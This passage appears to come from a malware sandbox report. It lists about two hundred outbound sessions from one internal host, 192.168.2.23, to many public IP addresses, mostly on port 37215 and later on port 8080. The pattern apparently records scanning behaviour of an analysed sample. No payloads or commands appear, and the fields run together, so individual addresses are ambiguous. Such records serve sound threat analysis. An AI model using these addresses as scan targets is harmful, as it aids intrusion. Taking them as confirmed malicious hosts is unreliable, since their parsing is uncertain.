                                                        33576192.168.2.2342044197.187.62.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33577192.168.2.2336368123.149.14.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33578192.168.2.2334566157.58.184.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33579192.168.2.2342030197.40.90.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33580192.168.2.234845641.118.70.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33581192.168.2.2353394157.97.204.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33582192.168.2.233915041.156.23.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33583192.168.2.233806241.163.174.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33584192.168.2.235279441.209.216.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33585192.168.2.2345070197.31.88.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33586192.168.2.234667650.70.57.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33587192.168.2.235192241.94.187.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33588192.168.2.2356860157.128.80.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33589192.168.2.234219891.80.186.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33590192.168.2.234233641.219.171.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33591192.168.2.235373441.52.169.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33592192.168.2.2347870157.24.179.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33593192.168.2.2350010197.14.113.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33594192.168.2.2340504197.160.93.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33595192.168.2.2344254157.32.26.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33596192.168.2.2359836157.37.141.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33597192.168.2.2341886197.237.59.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33598192.168.2.2356604197.204.229.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33599192.168.2.2351468157.191.187.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33600192.168.2.234048441.218.113.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33601192.168.2.233292441.55.84.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33602192.168.2.235195631.133.21.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33603192.168.2.2339308207.24.156.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33604192.168.2.234832441.232.29.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33605192.168.2.233817641.108.211.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33606192.168.2.2339506143.106.6.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33607192.168.2.233997041.16.54.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33608192.168.2.2349680157.90.134.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33609192.168.2.2352864197.174.122.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33610192.168.2.233660241.54.255.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33611192.168.2.235740241.223.105.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33612192.168.2.2348004157.10.67.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33613192.168.2.2350526197.174.56.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33614192.168.2.236038841.78.235.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33615192.168.2.2348750157.247.250.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33616192.168.2.2334468197.64.92.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33617192.168.2.2354640197.183.190.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33618192.168.2.2359068157.248.186.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33619192.168.2.2347794197.194.65.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33620192.168.2.235087076.26.76.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33621192.168.2.2334852157.19.69.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33622192.168.2.2339104197.114.131.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33623192.168.2.2339344196.83.189.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33624192.168.2.2346308197.69.135.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33625192.168.2.233948841.121.118.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33626192.168.2.2336490197.136.186.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33627192.168.2.2336188188.118.175.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33628192.168.2.2348338197.139.179.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33629192.168.2.2360612203.102.172.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33630192.168.2.233809441.137.177.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33631192.168.2.2338632157.33.108.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33632192.168.2.235570841.92.158.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33633192.168.2.2356108197.35.142.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33634192.168.2.234922841.130.25.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33635192.168.2.2336676157.147.54.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33636192.168.2.2360996197.123.187.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33637192.168.2.235433860.171.47.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33638192.168.2.234881678.175.187.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33639192.168.2.233809686.171.229.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33640192.168.2.235989668.133.97.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33641192.168.2.2339360167.248.10.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33642192.168.2.235317850.24.33.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33643192.168.2.2358936197.220.58.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33644192.168.2.2335118197.247.137.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33645192.168.2.2355880197.189.75.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33646192.168.2.233712641.69.243.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33647192.168.2.2347994157.170.122.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33648192.168.2.2349160163.112.42.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33649192.168.2.2350876197.183.34.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33650192.168.2.2352144197.208.63.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33651192.168.2.2342212197.164.12.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33652192.168.2.2340798118.199.112.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33653192.168.2.234739039.200.206.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33654192.168.2.233536069.67.229.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33655192.168.2.2353778197.107.160.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33656192.168.2.2348060197.70.226.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33657192.168.2.2336814157.218.248.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33658192.168.2.23483469.11.144.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33659192.168.2.2352430197.223.172.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33660192.168.2.234084641.168.134.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33661192.168.2.2347434157.4.59.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33662192.168.2.2341224157.189.6.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33663192.168.2.2351024197.250.122.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33664192.168.2.2354586157.57.211.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33665192.168.2.235746641.63.163.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33666192.168.2.2354222153.149.205.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33667192.168.2.2342852197.50.161.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33668192.168.2.2338768197.75.224.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33669192.168.2.2355534197.189.122.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33670192.168.2.235438641.177.101.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33671192.168.2.2357816157.2.87.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33672192.168.2.2343454157.10.55.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33673192.168.2.2341018197.159.153.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33674192.168.2.2337196197.25.119.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33675192.168.2.2352838157.126.98.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33676192.168.2.2336240157.24.169.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33677192.168.2.2347056157.250.135.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33678192.168.2.2349476192.235.195.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33679192.168.2.235903461.201.206.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33680192.168.2.2353378157.193.167.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33681192.168.2.234616041.83.148.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33682192.168.2.233968041.255.92.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33683192.168.2.234055041.250.37.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33684192.168.2.2358616197.157.100.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33685192.168.2.2342216157.236.19.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33686192.168.2.234740057.96.132.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33687192.168.2.233486641.133.202.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33688192.168.2.235012865.81.81.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33689192.168.2.2336560157.197.29.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33690192.168.2.235003441.19.157.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33691192.168.2.2346156157.2.135.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33692192.168.2.2336320149.197.251.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33693192.168.2.2343678137.201.21.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33694192.168.2.233647841.8.114.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33695192.168.2.234983040.46.106.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33696192.168.2.2336002157.54.224.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33697192.168.2.235315641.89.127.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33698192.168.2.2350902197.194.233.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33699192.168.2.234870241.7.102.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33700192.168.2.2336470157.20.54.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33701192.168.2.233475850.222.72.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33702192.168.2.235558641.2.140.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33703192.168.2.235441623.153.153.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33704192.168.2.2354388197.25.51.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33705192.168.2.23531388.181.171.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33706192.168.2.235790441.110.233.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33707192.168.2.234235641.23.38.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33708192.168.2.235068041.178.29.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33709192.168.2.2357852212.67.239.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33710192.168.2.233324641.99.182.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33711192.168.2.235394458.165.131.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33712192.168.2.2338582197.123.193.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33713192.168.2.2350900157.170.117.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33714192.168.2.233314041.234.70.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33715192.168.2.2338762103.151.11.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33716192.168.2.23386309.152.18.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33717192.168.2.233779241.60.132.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33718192.168.2.2343658157.72.243.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33719192.168.2.2353612197.212.176.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33720192.168.2.235621441.89.38.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33721192.168.2.2344124121.11.29.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33722192.168.2.233878841.70.57.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33723192.168.2.233315041.214.154.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33724192.168.2.2348260157.89.249.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33725192.168.2.235071241.119.25.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33726192.168.2.2347852166.219.74.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33727192.168.2.2347370120.37.176.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33728192.168.2.2338838197.144.230.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33729192.168.2.233510841.118.235.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33730192.168.2.235817641.190.162.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33731192.168.2.235982441.216.54.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33732192.168.2.2351964197.126.245.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33733192.168.2.234481241.131.37.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33734192.168.2.2334736197.218.27.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33735192.168.2.234820641.77.184.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33736192.168.2.233401241.116.143.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33737192.168.2.2347874191.72.16.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33738192.168.2.2355112157.176.69.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33739192.168.2.2346172197.149.72.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33740192.168.2.2354044197.160.70.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33741192.168.2.2338714157.45.55.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33742192.168.2.2353630157.221.51.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33743192.168.2.2358782100.230.237.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33744192.168.2.2342396197.223.31.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33745192.168.2.2336670157.243.43.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33746192.168.2.2357860109.134.132.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33747192.168.2.2334962197.251.182.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33748192.168.2.2357802110.53.228.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33749192.168.2.2337362157.87.36.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33750192.168.2.2338164102.201.207.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33751192.168.2.2358796178.55.135.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33752192.168.2.234710096.110.56.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33753192.168.2.2338582184.137.5.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33754192.168.2.2337820115.29.244.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33755192.168.2.2335020139.24.235.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33756192.168.2.2360274200.103.93.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33757192.168.2.233863059.225.110.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33758192.168.2.233653439.143.201.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33759192.168.2.2339672111.65.248.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33760192.168.2.234694647.54.54.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33761192.168.2.235705677.105.37.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33762192.168.2.233707042.229.74.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33763192.168.2.2340214111.34.67.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33764192.168.2.2357536108.249.175.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33765192.168.2.234828231.41.207.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33766192.168.2.2333840115.20.64.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33767192.168.2.2357652167.52.171.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33768192.168.2.2338976174.209.160.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33769192.168.2.2354470144.240.254.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33770192.168.2.2342960169.38.8.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33771192.168.2.234452698.124.5.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33772192.168.2.2359864200.75.87.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33773192.168.2.2347264148.155.143.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33774192.168.2.2341786187.249.5.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33775192.168.2.2339288209.119.67.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33776192.168.2.234445695.181.215.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33777192.168.2.2352944123.248.223.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33778192.168.2.23348465.225.104.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33779192.168.2.2350896124.69.121.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33780192.168.2.2339882157.28.157.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33781192.168.2.235316844.251.41.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33782192.168.2.2352502103.91.165.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33783192.168.2.233585893.41.48.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33784192.168.2.23337485.103.209.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33785192.168.2.2353702153.106.27.638080
                                                        TimestampBytes transferredDirectionData


